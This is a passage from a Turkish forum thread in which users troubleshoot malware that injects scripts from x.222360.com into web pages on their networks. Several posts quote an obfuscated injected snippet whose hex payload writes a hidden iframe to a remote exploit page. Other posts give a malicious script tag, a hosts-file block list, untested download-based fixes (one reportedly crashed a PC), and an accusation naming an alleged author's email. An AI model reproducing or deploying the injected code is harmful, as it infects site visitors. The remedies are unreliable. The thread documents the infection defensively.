Arama butonu
Bu konudaki kullanıcılar: 3 misafir, 2 mobil kullanıcı
64
Cevap
4981
Tıklama
0
Öne Çıkarma
Cevap: http://x.222360.com/un.js (3. sayfa)
B
18 yıl
Onbaşı
Konu Sahibi

Arkadaşlar bi çözüm yolu buldum ama kesinliğini görmek için 1-2 gün beklemek gerekiyor. Şuanda böyle bir sorun kalmadı.
Ağınızdaki bilgisayarınızı "Advanced-Windows-Cleaner" ile taratın; linkli aşağıda...
http://www.download.com/Advanced-Windows-Cleaner/3000-2086_4-10288368.html

Yanlız tarama yapmadan önce swichleri modemleri kapatım ;)

Bu işlemden sonra sonuçları bildirirseniz
Yönetimin netliğini görmüş oluruz ;)

kolay gelsin





< Bu mesaj bu kişi tarafından değiştirildi bluerman -- 17 Ocak 2008; 10:15:18 >
Bu mesaja 1 cevap geldi.
M
18 yıl
Er

Aynı problemi ben de yaşıyorum ve kesinlikle ağ üzerinden geldiğine inanıyorum, sebebi ise yeni sistem kurduğum PC'de bile eskiden bulaşmış olabilecek bir virüs olabilme ihtimalini düşünerek herhangi bir flashdisk veya harici bir şey takmadan doğrudan internetten download ettiğim antivirus programı ile gelen atakları görebiliyorum, ayrıca arkadaşın bahsettiği gibi web sayfalarının kaynak kodları arasında hatta ve hatta kendi yaptığım bir sitede bile ilk satırda
quote:

<script></script>
tagları arasında javascript çalıştırıyordu. ASP sayfamı tekrar locale indirip açtığım zaman ilk satırda;

quote:

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v475f9ffca7ec9(v475f9ffca8660){ function v475f9ffca8e57 () {var v475f9ffca96f4=16; return v475f9ffca96f4;} return(parseInt(v475f9ffca8660,v475f9ffca8e57()));}function v475f9ffca9e4d(v475f9ffcaa643){ var v475f9ffcabe2d=2; var v475f9ffcaae39='';for(v475f9ffcab63a=0; v475f9ffcab63a<v475f9ffcaa643.length; v475f9ffcab63a+=v475f9ffcabe2d){ v475f9ffcaae39+=(String.fromCharCode(v475f9ffca7ec9(v475f9ffcaa643.substr(v475f9ffcab63a, v475f9ffcabe2d))));}return v475f9ffcaae39;} document.write(v475f9ffca9e4d('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6334207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3130393230292B27356365353533335C272077696474683D3536206865696768743D313935207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>


şeklinde bir kod gördüm, encode edecek kapasitede arkadaşlarımız varsa belki problemin çözümünde yeni fikirler üretebiliriz.
Nod32, Kaspersky gibi antivirüslere lafım yok ama onlarla halledilebilecek iş gibi görünmüyor, sadece bağlantıyı terminate edebiliyorlar kaynağı bulup silemiyorlar, bunun sebebini de bahsettiğim gibi ağdaki bir PC den kaynaklı problem olarak düşünüyorum ben şahsım adına.
95 tane PC var farklı farklı sistemleri var, hepsine format atmam mümkün değil, virus'un hangisinde olduğunu bulmadan da format anlamlı değil zaten.
Sabırsızlıkla bekliyorum çaresini bulabilecekmiyiz..
Kolay gelsin.


Bu mesaja 1 cevap geldi.
M
18 yıl
Er

Aynı problemi ben de yaşıyorum ve kesinlikle ağ üzerinden geldiğine inanıyorum, sebebi ise yeni sistem kurduğum PC'de bile eskiden bulaşmış olabilecek bir virüs olabilme ihtimalini düşünerek herhangi bir flashdisk veya harici bir şey takmadan doğrudan internetten download ettiğim antivirus programı ile gelen atakları görebiliyorum, ayrıca arkadaşın bahsettiği gibi web sayfalarının kaynak kodları arasında hatta ve hatta kendi yaptığım bir sitede bile ilk satırda
quote:

<script></script>
tagları arasında javascript çalıştırıyordu. ASP sayfamı tekrar locale indirip açtığım zaman ilk satırda;
 
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v475f9ffca7ec9(v475f9ffca8660){ function v475f9ffca8e57 () {var v475f9ffca96f4=16; return v475f9ffca96f4;} return(parseInt(v475f9ffca8660,v475f9ffca8e57()));}function v475f9ffca9e4d(v475f9ffcaa643){ var v475f9ffcabe2d=2; var v475f9ffcaae39='';for(v475f9ffcab63a=0; v475f9ffcab63a<v475f9ffcaa643.length; v475f9ffcab63a+=v475f9ffcabe2d){ v475f9ffcaae39+=(String.fromCharCode(v475f9ffca7ec9(v475f9ffcaa643.substr(v475f9ffcab63a, v475f9ffcabe2d))));}return v475f9ffcaae39;} document.write(v475f9ffca9e4d('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6334207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3130393230292B27356365353533335C272077696474683D3536206865696768743D313935207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

şeklinde bir kod gördüm, encode edecek kapasitede arkadaşlarımız varsa belki problemin çözümünde yeni fikirler üretebiliriz.
Nod32, Kaspersky gibi antivirüslere lafım yok ama onlarla halledilebilecek iş gibi görünmüyor, sadece bağlantıyı terminate edebiliyorlar kaynağı bulup silemiyorlar, bunun sebebini de bahsettiğim gibi ağdaki bir PC den kaynaklı problem olarak düşünüyorum ben şahsım adına.
95 tane PC var farklı farklı sistemleri var, hepsine format atmam mümkün değil, virus'un hangisinde olduğunu bulmadan da format anlamlı değil zaten.
Sabırsızlıkla bekliyorum çaresini bulabilecekmiyiz..
Kolay gelsin.


Bu mesaja 1 cevap geldi.
L
18 yıl
Yüzbaşı

bende x.222360.com adresini blockladım sunucudan.. dün gecewww.intel.com açılmıyordu x.222360.com bloğunu kaldırdığım zaman açılıyordu..

burdan yola çıkarsak bu arkadaşın intelede bulaşmış olduğunu düşünebilirmiyiz?


Bu mesaja 1 cevap geldi.
G
18 yıl
Onbaşı

Ayni problemi ben de yasiyorum ve kesinlikle ag üzerinden geldigine inaniyorum, sebebi ise yeni sistem kurdugum PC'de bile eskiden bulasmis olabilecek bir virüs olabilme ihtimalini düsünerek herhangi bir flashdisk veya harici bir sey takmadan dogrudan internetten download ettigim antivirus programi ile gelen ataklari görebiliyorum, ayrica arkadasin bahsettigi gibi web sayfalarinin kaynak kodlari arasinda hatta ve hatta kendi yaptigim bir sitede bile ilk satirda
quote:

<script></script>
taglari arasinda javascript çalistiriyordu. ASP sayfami tekrar locale indirip açtigim zaman
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v475f9ffca7ec9(v475f9ffca8660){ function v475f9ffca8e57 () {var v475f9ffca96f4=16; return v475f9ffca96f4;} return(parseInt(v475f9ffca8660,v475f9ffca8e57()));}function v475f9ffca9e4d(v475f9ffcaa643){ var v475f9ffcabe2d=2; var v475f9ffcaae39='';for(v475f9ffcab63a=0; v475f9ffcab63a<v475f9ffcaa643.length; v475f9ffcab63a+=v475f9ffcabe2d){ v475f9ffcaae39+=(String.fromCharCode(v475f9ffca7ec9(v475f9ffcaa643.substr(v475f9ffcab63a, v475f9ffcabe2d))));}return v475f9ffcaae39;} document.write(v475f9ffca9e4d('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6334207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3130393230292B27356365353533335C272077696474683D3536206865696768743D313935207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

seklinde bir kod gördüm, encode edecek kapasitede arkadaslarimiz varsa belki problemin çözümünde yeni fikirler üretebiliriz.
Nod32, Kaspersky gibi antivirüslere lafim yok ama onlarla halledilebilecek is gibi görünmüyor, sadece baglantiyi terminate edebiliyorlar kaynagi bulup silemiyorlar, bunun sebebini de bahsettigim gibi agdaki bir PC den kaynakli problem olarak düsünüyorum ben sahsim adina.
95 tane PC var farkli farkli sistemleri var hepsine format atmam mümkün degil, virus'un hangisinde oldugunu bulmadan da format anlamli degil zaten.
Sabirsizlikla bekliyorum çaresini bulabilecekmiyiz..
Kolay gelsin.


Bu mesaja 1 cevap geldi.
K
18 yıl
Onbaşı

Arkadaşlar çözüm bulan varmı bendede aynı cafedeki masalarda deepfreze yüklü ana masada yüklü değil sadece anamasada int.expl. açınca nod32 uyarı verip girmesini engelliyor sadece çözüm bulan varsa bi zahmet yazsın


Bu mesaja 1 cevap geldi.
O
18 yıl
Onbaşı

Arkadaşlar bi sorun bendede var.1 haftadir pc leri her gece formatliyorum. hic bi çözümü yok f disk bile attim. dene olmuyor. bunun bir gelme yolu var. bence SABİT Ip den ddos saldirisi gibi bir saldiri tipi iLe geliyor... bu sunucular bizim ip leri kaydetmiş olabilir.... BENİ SORMAk istediğim. SOru

BU SORUNU YAşİYAN ARKADAŞLARİMİZİN HEPSİ SABİT İP MI KULLANİYOR...





< Bu mesaj bu kişi tarafından değiştirildi Ordu_52 -- 18 Ocak 2008; 22:11:08 >
Bu mesaja 1 cevap geldi.
K
18 yıl
Onbaşı

Benimki sabit ip biraz ugraştım explorer sayfalarının başına bi sciript atıyo bu meret ve sayfa oraya yönleniyo attıgı sciript
<SCRIPT LANGUAGE="javascript1.2" SRC="http://g.asdafdgfgf.com/ads.js"></SCRIPT> bu manyak bişi bu ya orda yazan adresi yasak sitelere ekledim bi ses çıkamdı daha ne olacak bakacam. artı int. hızım 4096 ama nerdeee testlerde 1500-1600 bazen 700-900 çıkıyodu yasaklara ekleyince hız arttı 3300 lerde falan şuan ama ne olur bilinmez yine hortlar bu biyerlerden çünkü sürekli adres değiştiriyomuş zıkım çaresini bulan varsa paylaşsın arkadaşlar bi ara yine olmuştu modemi fabrika ayarlarına getirdim epey bi gitmişti o şekilde şimdi gene başladı


Bu mesaja 1 cevap geldi.
S
18 yıl
Çavuş

bende sabit ip yok ama sorun var arkadaşlar bilginize....



G
18 yıl
Onbaşı

Zhang San (net1363@126.com)
Xiamen, Hongkong CN

İşte virusun sahibi .. çocuğu

net1363@126.com adresinden ingilizce küfür edip bir nebze de olsa gevşeyebiliriz..


Bu mesaja 1 cevap geldi.
B
18 yıl
Onbaşı
Konu Sahibi

Arkadaşlar çözümü yukarıda yazmıştım mesajımı aşağıya tekrar alıntı yapıyorum.

quote:

Arkadaşlar bi çözüm yolu buldum ama kesinliğini görmek için 1-2 gün beklemek gerekiyor. Şuanda böyle bir sorun kalmadı.
Ağınızdaki bilgisayarınızı "Advanced-Windows-Cleaner" ile taratın; linkli aşağıda...
http://www.download.com/Advanced-Windows-Cleaner/3000-2086_4-10288368.html

Yanlız tarama yapmadan önce swichleri modemleri kapatım ;)

Bu işlemden sonra sonuçları bildirirseniz
Yönetimin netliğini görmüş oluruz ;)

kolay gelsin


Sorunu bu şekilde çözdüm. Bu melet kendini kayıtdefterinde alakasız yerlere yazıyor ve bulması zorlaşıyor.
Üstteki araç ile sorunu çözdüm. Bir ağa bağlıysanız makinanızı ve ağa bağlı tüm makinaları ağdan çıkarın ve hepsini bununla temizleyin ;)

Kolay gelsin... ;)


Bu mesaja 2 cevap geldi.
K
18 yıl
Yüzbaşı

virus ağ üzerinden bir makinaya yerleşip ağ kuruyor. proxy gibi bişey ve internet o bilgisayar üzerinden geliyormuş gibi oluyor ve tüm makinalarda virus uyarısı veriyor. doğru makinaı bulup fişi çekince hiç bir bilgisyara bağlantı gitmiyor...
çözümü

avastın sitesinden home editionu indir. kur ve yeniden başlat. açılışta mavi ekranda tarama yapacak olan virusu bukup yakalayıp siliyor. ama tek bilgisayar kullanlara bulaşsa bile çıkmıyor uyarı haberiniz olsun genellikle ağ ortamında olan bilgisayarlarda çıkıyor.


hiç başka programla uğraşmayın 25 bilgsayar canavar gibi çalışıyor...


Bu mesaja 1 cevap geldi.
Y
18 yıl
Çavuş

Firefoxu açtığınızda geliyor denilmiş.Noscript eklentisine rağmen tarayıcıda aktif olabiliyor mu?Kendini cache'e atıyor sanırım?.



_
18 yıl
Binbaşı

Ağınızı kullanan bir virüs bizim teknik servise gelen bir pc de vardı ağ kablosunu takar takmaz ağdan hemen bulaştı ve ip yolu ile virüs yaklandığı için yenisinin girmesine çalışıyor, yapacağınız işlem;

- Ağdaki tüm pc lerin ağ kablosunu çekiniz

- Tüm pc lere Nod32 kurunuz

- Tüm pc leri derinlemesine tarayınız

- temzledikten sonra ağ kalblolarını yeniden takınız.


Bu mesaja 1 cevap geldi.
K
18 yıl
Yüzbaşı

avastla mavi ekranda taratın askeriyedeki 25 bilgiayarı temizledim. nod32 pek bulamıyor


Bu mesaja 1 cevap geldi.
M
17 yıl
Er

c:windows\system32\drivers\etc altındaki host dosyasını not defteri ile açıp şu satırları girilecek


127.0.0.1 union.222360.com
127.0.0.1www.union.222360.com
127.0.0.1 k.222360.com
127.0.0.1www.k.222360.com
127.0.0.1 s.222360.com
127.0.0.1 v.222360.com
127.0.0.1 asdafdgfgf.com
127.0.0.1www.asdafdgfgf.com
127.0.0.1 g.asdafdgfgf.com
127.0.0.1www.g.asdafdgfgf.com

Ben bu şekilde çözdüm sorunu...


Bu mesaja 1 cevap geldi.
A
17 yıl
Teğmen

arkadaşlar bu virüs bulaşan kişi öncelikle internette bir sayfa açsın ondan sonrada görünüm menüsünden kaynak'a girip baksın diyorum sadece ben bir ilk yaptım ve sorunu çözdüm otomatik olarak script kaynağıyla her internet sayfasında bu tanımlamayi kullaniyor çünkü bizi kandırcağını saniyor ama ben kül yutmam diyorsaniz önce temel kaynak kodlarini ögrenmelisiniz bide windows templerini ziyaret etmelisiniz . Ben BU Banka Şİfrecilerinin olayini çok basit buldum bu kadarda açık kod verilmezki trojenin en değişik kafa karıştıran sorunudur bu mevzu .Çözümü bASit



B
17 yıl
Yarbay

quote:

Orjinalden alıntı: bluerman

Arkadaşlar çözümü yukarıda yazmıştım mesajımı aşağıya tekrar alıntı yapıyorum.

quote:

Arkadaşlar bi çözüm yolu buldum ama kesinliğini görmek için 1-2 gün beklemek gerekiyor. Şuanda böyle bir sorun kalmadı.
Ağınızdaki bilgisayarınızı "Advanced-Windows-Cleaner" ile taratın; linkli aşağıda...
http://www.download.com/Advanced-Windows-Cleaner/3000-2086_4-10288368.html

Yanlız tarama yapmadan önce swichleri modemleri kapatım ;)

Bu işlemden sonra sonuçları bildirirseniz
Yönetimin netliğini görmüş oluruz ;)

kolay gelsin


Sorunu bu şekilde çözdüm. Bu melet kendini kayıtdefterinde alakasız yerlere yazıyor ve bulması zorlaşıyor.
Üstteki araç ile sorunu çözdüm. Bir ağa bağlıysanız makinanızı ve ağa bağlı tüm makinaları ağdan çıkarın ve hepsini bununla temizleyin ;)

Kolay gelsin... ;)

Sorunu yine kendiniz çözmüşsünüz.Bilgiler için teşekkürler..


Bu mesaja 1 cevap geldi.
A
17 yıl
Teğmen

quote:

Orjinalden alıntı: bodrumlu2


quote:

Orjinalden alıntı: bluerman

Arkadaşlar çözümü yukarıda yazmıştım mesajımı aşağıya tekrar alıntı yapıyorum.

quote:

Arkadaşlar bi çözüm yolu buldum ama kesinliğini görmek için 1-2 gün beklemek gerekiyor. Şuanda böyle bir sorun kalmadı.
Ağınızdaki bilgisayarınızı "Advanced-Windows-Cleaner" ile taratın; linkli aşağıda...
http://www.download.com/Advanced-Windows-Cleaner/3000-2086_4-10288368.html

Yanlız tarama yapmadan önce swichleri modemleri kapatım ;)

Bu işlemden sonra sonuçları bildirirseniz
Yönetimin netliğini görmüş oluruz ;)

kolay gelsin


Sorunu bu şekilde çözdüm. Bu melet kendini kayıtdefterinde alakasız yerlere yazıyor ve bulması zorlaşıyor.
Üstteki araç ile sorunu çözdüm. Bir ağa bağlıysanız makinanızı ve ağa bağlı tüm makinaları ağdan çıkarın ve hepsini bununla temizleyin ;)

Kolay gelsin... ;)

Sorunu yine kendiniz çözmüşsünüz.Bilgiler için teşekkürler..



arkadaşım dediklerini aynen yaptım bilgisayar direk çöktü:S:S:S:S:S sevis pack ile ilgili bişiler sildi kafasına göre bilgisayar bildiğin çöktü format atıorum şuanda???? bu bilgisayarda da virüs war ama arkadaşınki kurban oldu bunu kullanmamanızı tafsiye ederim !!!!!!! hemde ŞİDDETLE!!!


Bu mesaja 1 cevap geldi.
G
17 yıl
Yüzbaşı

Benim çalıştığım okuldada bu virus gözüktü. 5 6 gündür deli etti beni çözümü buldum.


http://www.netoptima.in/ARProtect_Setup_0.12.27.exe

Bu programı çekip kurun sonra pc yi yeniden başlatın virusun server olarak kullandığı pcleri listeliyor onları tek tek temizleyin sorun çözülüyor


Bu mesaja 2 cevap geldi.